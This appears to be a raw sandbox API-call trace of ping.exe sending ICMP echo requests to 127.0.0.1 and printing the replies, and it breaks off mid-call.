Region: id = 1509 start_va = 0xd80000 end_va = 0xdbffff entry_point = 0x0 region_type = private name = "private_0x0000000000d80000" filename = "" Region: id = 1510 start_va = 0xdc0000 end_va = 0xdfffff entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 1511 start_va = 0x7f9a4000 end_va = 0x7f9a6fff entry_point = 0x0 region_type = private name = "private_0x000000007f9a4000" filename = "" Region: id = 1512 start_va = 0x73da0000 end_va = 0x73de4fff entry_point = 0x73da0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 1513 start_va = 0xc20000 end_va = 0xc22fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c20000" filename = "" Region: id = 1514 start_va = 0xe00000 end_va = 0xe00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e00000" filename = "" Region: id = 1515 start_va = 0xe10000 end_va = 0xe12fff entry_point = 0xe10000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ping.exe.mui") Region: id = 1587 start_va = 0xf20000 end_va = 0xf5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f20000" filename = "" Region: id = 1588 start_va = 0xf60000 end_va = 0xf9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f60000" filename = "" Region: id = 1589 start_va = 0x7f87d000 end_va = 0x7f87ffff entry_point = 0x0 region_type = private name = "private_0x000000007f87d000" filename = "" Thread: id = 48 os_tid = 0x934 [0038.613] GetModuleHandleA (lpModuleName=0x0) returned 0x940000 [0038.613] __set_app_type (_Type=0x1) [0038.613] __p__fmode () returned 0x76ea1768 [0038.613] __p__commode () returned 0x76ea176c [0038.613] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x943229) returned 0x0 [0038.613] __wgetmainargs (in: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0, _DoWildCard=0, _StartInfo=0x9440dc | out: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0) returned 0 [0038.613] SetThreadUILanguage (LangId=0x0) returned 0x409 [0038.621] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0038.621] _fileno (_File=0x76ea4c28) returned 1 [0038.621] _get_osfhandle (_FileHandle=1) returned 0x28 [0038.621] GetFileType (hFile=0x28) returned 0x2 [0038.621] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf480 | out: lpMode=0xcbf480) returned 0 [0038.622] GetLastError () returned 0x6 [0038.622] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3e4, nSize=0x50 | out: lpBuffer="䤐â") returned 0x0 [0038.622] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x945500 | out: lpWSAData=0x945500) returned 0 [0038.629] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0xcbf49c | out: phkResult=0xcbf49c*=0x88) returned 0x0 [0038.629] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0xcbf490, lpData=0xcbf498, lpcbData=0xcbf494*=0x4 | out: lpType=0xcbf490*=0x0, lpData=0xcbf498*=0x0, lpcbData=0xcbf494*=0x4) returned 0x2 [0038.629] RegCloseKey (hKey=0x88) returned 0x0 [0038.629] GetAddrInfoW (in: pNodeName="127.1", pServiceName=0x0, pHints=0xcbf460*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xcbf49c | out: ppResult=0xcbf49c*=0xe2c138*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xe28970*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) returned 0 [0038.629] FreeAddrInfoW (pAddrInfo=0xe2c138*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xe28970*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) [0038.666] IcmpCreateFile () returned 0xe26b80 [0038.675] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0xe2c1b0 [0038.675] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0xe35270 [0038.675] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0xcbf598, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0038.825] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0xcbf490, nSize=0x0, Arguments=0xcbf48c | out: lpBuffer="竈ã﹤Ë┗\x94䰨盪❋") returned 0x14 [0038.847] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0038.847] _fileno (_File=0x76ea4c28) returned 1 [0038.847] _get_osfhandle (_FileHandle=1) returned 0x28 [0038.847] GetFileType (hFile=0x28) returned 0x2 [0038.847] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf454 | out: lpMode=0xcbf454) returned 0 [0038.847] GetLastError () returned 0x6 [0038.847] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3b8, nSize=0x50 | out: lpBuffer="Ë❋") returned 0x0 [0038.847] _fileno (_File=0x76ea4c28) returned 1 [0038.847] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0038.847] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0038.847] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0xe37b00 [0038.847] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0xe37b00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPinging 127.0.0.1 ", lpUsedDefaultChar=0x0) returned 21 [0038.848] _fileno (_File=0x76ea4c28) returned 1 [0038.848] _write (in: _FileHandle=1, _Buf=0xe37b00*, _MaxCharCount=0x14 | out: _Buf=0xe37b00*) returned 20 [0038.848] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0038.848] _fileno (_File=0x76ea4c28) returned 1 [0038.848] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0038.848] LocalFree (hMem=0xe37b00) returned 0x0 [0038.848] LocalFree (hMem=0xe37ac8) returned 0x0 [0038.848] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0xcbf490, nSize=0x0, Arguments=0xcbf48c | out: lpBuffer="竈ã﹤Ë▪\x94䰨盪❚") returned 0x18 [0038.848] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0038.848] _fileno (_File=0x76ea4c28) returned 1 [0038.848] _get_osfhandle (_FileHandle=1) returned 0x28 [0038.848] GetFileType (hFile=0x28) returned 0x2 [0038.848] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf454 | out: lpMode=0xcbf454) returned 0 [0038.848] GetLastError () returned 0x6 [0038.848] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3b8, nSize=0x50 | out: lpBuffer="Ë❚") returned 0x0 [0038.848] _fileno (_File=0x76ea4c28) returned 1 [0038.848] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0038.848] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0038.848] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0xe2c340 [0038.848] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0xe2c340, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="with 32 bytes of data:\r\n", lpUsedDefaultChar=0x0) returned 25 [0038.848] _fileno (_File=0x76ea4c28) returned 1 [0038.848] _write (in: _FileHandle=1, _Buf=0xe2c340*, _MaxCharCount=0x18 | out: _Buf=0xe2c340*) returned 24 [0038.848] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0038.848] _fileno (_File=0x76ea4c28) returned 1 [0038.848] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0038.848] LocalFree (hMem=0xe2c340) returned 0x0 [0038.848] LocalFree (hMem=0xe37ac8) returned 0x0 [0038.848] SetConsoleCtrlHandler (HandlerRoutine=0x941a3d, Add=1) returned 1 [0038.848] IcmpSendEcho2Ex (in: IcmpHandle=0xe26b80, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xe2c1b0, RequestSize=0x20, RequestOptions=0xcbf50c, ReplyBuffer=0xe35270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xe35270) returned 0x1 [0038.851] InetNtopW (in: Family=2, pAddr=0xcbf4fc, pStringBuf=0xcbf624, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0038.851] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcbf490, nSize=0x0, Arguments=0xcbf48c | out: lpBuffer="笈ã﹤Ë⛔\x94䰨盪✣") returned 0x16 [0038.851] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0038.851] _fileno (_File=0x76ea4c28) returned 1 [0038.851] _get_osfhandle (_FileHandle=1) returned 0x28 [0038.851] GetFileType (hFile=0x28) returned 0x2 [0038.851] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf454 | out: lpMode=0xcbf454) returned 0 [0038.851] GetLastError () returned 0x6 [0038.851] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3b8, nSize=0x50 | out: lpBuffer="Ë✣") returned 0x0 [0038.851] _fileno (_File=0x76ea4c28) returned 1 [0038.851] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0038.851] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0038.851] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xe37b40 [0038.851] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xe37b40, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0038.851] _fileno (_File=0x76ea4c28) returned 1 [0038.851] _write (in: _FileHandle=1, _Buf=0xe37b40*, _MaxCharCount=0x16 | out: _Buf=0xe37b40*) returned 22 [0038.851] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0038.851] _fileno (_File=0x76ea4c28) returned 1 [0038.851] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0038.851] LocalFree (hMem=0xe37b40) returned 0x0 [0038.851] LocalFree (hMem=0xe37b08) returned 0x0 [0038.851] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xcbf490, nSize=0x0, Arguments=0xcbf48c | out: lpBuffer="笈ã﹤Ë⛿\x94䰨盪✼") returned 0x9 [0038.851] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0038.851] _fileno (_File=0x76ea4c28) returned 1 [0038.851] _get_osfhandle (_FileHandle=1) returned 0x28 [0038.851] GetFileType (hFile=0x28) returned 0x2 [0038.851] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf454 | out: lpMode=0xcbf454) returned 0 [0038.851] GetLastError () returned 0x6 [0038.851] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3b8, nSize=0x50 | out: lpBuffer="Ë✼") returned 0x0 [0038.851] _fileno (_File=0x76ea4c28) returned 1 [0038.851] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0038.851] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0038.851] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe28958 [0038.851] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xe28958, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0038.851] _fileno (_File=0x76ea4c28) returned 1 [0038.851] _write (in: _FileHandle=1, _Buf=0xe28958*, _MaxCharCount=0x9 | out: _Buf=0xe28958*) returned 9 [0038.851] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0038.851] _fileno (_File=0x76ea4c28) returned 1 [0038.851] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0038.851] LocalFree (hMem=0xe28958) returned 0x0 [0038.851] LocalFree (hMem=0xe37b08) returned 0x0 [0038.852] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xcbf494, nSize=0x0, Arguments=0xcbf490 | out: lpBuffer="笈ã﹤Ë➷\x94䰨盪✧") returned 0x9 [0038.852] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0038.852] _fileno (_File=0x76ea4c28) returned 1 [0038.852] _get_osfhandle (_FileHandle=1) returned 0x28 [0038.852] GetFileType (hFile=0x28) returned 0x2 [0038.852] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf458 | out: lpMode=0xcbf458) returned 0 [0038.852] GetLastError () returned 0x6 [0038.852] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3bc, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0038.852] _fileno (_File=0x76ea4c28) returned 1 [0038.852] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0038.852] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0038.852] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe28910 [0038.852] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xe28910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0038.852] _fileno (_File=0x76ea4c28) returned 1 [0038.852] _write (in: _FileHandle=1, _Buf=0xe28910*, _MaxCharCount=0x9 | out: _Buf=0xe28910*) returned 9 [0038.852] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0038.852] _fileno (_File=0x76ea4c28) returned 1 [0038.852] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0038.852] LocalFree (hMem=0xe28910) returned 0x0 [0038.852] LocalFree (hMem=0xe37b08) returned 0x0 [0038.852] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xcbf490, nSize=0x0, Arguments=0xcbf48c | out: lpBuffer="笈ã﹤Ë⟘\x94䰨盪✨") returned 0x9 [0038.852] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0038.852] _fileno (_File=0x76ea4c28) returned 1 [0038.852] _get_osfhandle (_FileHandle=1) returned 0x28 [0038.852] GetFileType (hFile=0x28) returned 0x2 [0038.852] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf454 | out: lpMode=0xcbf454) returned 0 [0038.852] GetLastError () returned 0x6 [0038.852] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3b8, nSize=0x50 | out: lpBuffer="Ë✨") returned 0x0 [0038.852] _fileno (_File=0x76ea4c28) returned 1 [0038.852] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0038.852] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0038.852] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe28928 [0038.852] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xe28928, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0038.852] _fileno (_File=0x76ea4c28) returned 1 [0038.852] _write (in: _FileHandle=1, _Buf=0xe28928*, _MaxCharCount=0x9 | out: _Buf=0xe28928*) returned 9 [0038.852] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0038.852] _fileno (_File=0x76ea4c28) returned 1 [0038.852] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0038.852] LocalFree (hMem=0xe28928) returned 0x0 [0038.852] LocalFree (hMem=0xe37b08) returned 0x0 [0038.852] Sleep (dwMilliseconds=0x3e8) [0039.866] IcmpSendEcho2Ex (in: IcmpHandle=0xe26b80, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xe2c1b0, RequestSize=0x20, RequestOptions=0xcbf50c, ReplyBuffer=0xe35270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xe35270) returned 0x1 [0039.867] InetNtopW (in: Family=2, pAddr=0xcbf4fc, pStringBuf=0xcbf624, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0039.867] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcbf490, nSize=0x0, Arguments=0xcbf48c | out: lpBuffer="竈ã﹤Ë⛔\x94䰨盪✣") returned 0x16 [0039.867] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0039.867] _fileno (_File=0x76ea4c28) returned 1 [0039.867] _get_osfhandle (_FileHandle=1) returned 0x28 [0039.867] GetFileType (hFile=0x28) returned 0x2 [0039.867] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf454 | out: lpMode=0xcbf454) returned 0 [0039.867] GetLastError () returned 0x6 [0039.867] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3b8, nSize=0x50 | out: lpBuffer="Ë✣") returned 0x0 [0039.867] _fileno (_File=0x76ea4c28) returned 1 [0039.867] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0039.867] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0039.867] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xe37fe8 [0039.867] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xe37fe8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0039.867] _fileno (_File=0x76ea4c28) returned 1 [0039.867] _write (in: _FileHandle=1, _Buf=0xe37fe8*, _MaxCharCount=0x16 | out: _Buf=0xe37fe8*) returned 22 [0039.867] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0039.867] _fileno (_File=0x76ea4c28) returned 1 [0039.867] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0039.867] LocalFree (hMem=0xe37fe8) returned 0x0 [0039.867] LocalFree (hMem=0xe37ac8) returned 0x0 [0039.867] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xcbf490, nSize=0x0, Arguments=0xcbf48c | out: lpBuffer="翨ã﹤Ë⛿\x94䰨盪✼") returned 0x9 [0039.867] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0039.867] _fileno (_File=0x76ea4c28) returned 1 [0039.867] _get_osfhandle (_FileHandle=1) returned 0x28 [0039.867] GetFileType (hFile=0x28) returned 0x2 [0039.867] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf454 | out: lpMode=0xcbf454) returned 0 [0039.867] GetLastError () returned 0x6 [0039.867] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3b8, nSize=0x50 | out: lpBuffer="Ë✼") returned 0x0 [0039.867] _fileno (_File=0x76ea4c28) returned 1 [0039.867] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0039.867] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0039.867] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe28970 [0039.867] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xe28970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0039.868] _fileno (_File=0x76ea4c28) returned 1 [0039.868] _write (in: _FileHandle=1, _Buf=0xe28970*, _MaxCharCount=0x9 | out: _Buf=0xe28970*) returned 9 [0039.868] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0039.868] _fileno (_File=0x76ea4c28) returned 1 [0039.868] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0039.868] LocalFree (hMem=0xe28970) returned 0x0 [0039.868] LocalFree (hMem=0xe37fe8) returned 0x0 [0039.868] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xcbf494, nSize=0x0, Arguments=0xcbf490 | out: lpBuffer="翨ã﹤Ë➷\x94䰨盪✧") returned 0x9 [0039.868] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0039.868] _fileno (_File=0x76ea4c28) returned 1 [0039.868] _get_osfhandle (_FileHandle=1) returned 0x28 [0039.868] GetFileType (hFile=0x28) returned 0x2 [0039.868] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf458 | out: lpMode=0xcbf458) returned 0 [0039.868] GetLastError () returned 0x6 [0039.868] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3bc, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0039.868] _fileno (_File=0x76ea4c28) returned 1 [0039.868] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0039.868] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0039.868] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe28910 [0039.868] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xe28910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0039.868] _fileno (_File=0x76ea4c28) returned 1 [0039.868] _write (in: _FileHandle=1, _Buf=0xe28910*, _MaxCharCount=0x9 | out: _Buf=0xe28910*) returned 9 [0039.868] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0039.868] _fileno (_File=0x76ea4c28) returned 1 [0039.868] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0039.868] LocalFree (hMem=0xe28910) returned 0x0 [0039.868] LocalFree (hMem=0xe37fe8) returned 0x0 [0039.868] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xcbf490, nSize=0x0, Arguments=0xcbf48c | out: lpBuffer="翨ã﹤Ë⟘\x94䰨盪✨") returned 0x9 [0039.868] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0039.868] _fileno (_File=0x76ea4c28) returned 1 [0039.868] _get_osfhandle (_FileHandle=1) returned 0x28 [0039.868] GetFileType (hFile=0x28) returned 0x2 [0039.868] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf454 | out: lpMode=0xcbf454) returned 0 [0039.868] GetLastError () returned 0x6 [0039.868] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3b8, nSize=0x50 | out: lpBuffer="Ë✨") returned 0x0 [0039.868] _fileno (_File=0x76ea4c28) returned 1 [0039.868] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0039.868] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0039.868] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe28958 [0039.868] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xe28958, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0039.868] _fileno (_File=0x76ea4c28) returned 1 [0039.868] _write (in: _FileHandle=1, _Buf=0xe28958*, _MaxCharCount=0x9 | out: _Buf=0xe28958*) returned 9 [0039.868] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0039.868] _fileno (_File=0x76ea4c28) returned 1 [0039.868] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0039.868] LocalFree (hMem=0xe28958) returned 0x0 [0039.868] LocalFree (hMem=0xe37fe8) returned 0x0 [0039.868] Sleep (dwMilliseconds=0x3e8) [0040.882] IcmpSendEcho2Ex (in: IcmpHandle=0xe26b80, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xe2c1b0, RequestSize=0x20, RequestOptions=0xcbf50c, ReplyBuffer=0xe35270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xe35270) returned 0x1 [0040.887] InetNtopW (in: Family=2, pAddr=0xcbf4fc, pStringBuf=0xcbf624, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0040.887] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcbf490, nSize=0x0, Arguments=0xcbf48c | out: lpBuffer="竈ã﹤Ë⛔\x94䰨盪✣") returned 0x16 [0040.887] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0040.887] _fileno (_File=0x76ea4c28) returned 1 [0040.887] _get_osfhandle (_FileHandle=1) returned 0x28 [0040.887] GetFileType (hFile=0x28) returned 0x2 [0040.887] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf454 | out: lpMode=0xcbf454) returned 0 [0040.887] GetLastError () returned 0x6 [0040.887] GetEnvironmentVariableW (in: 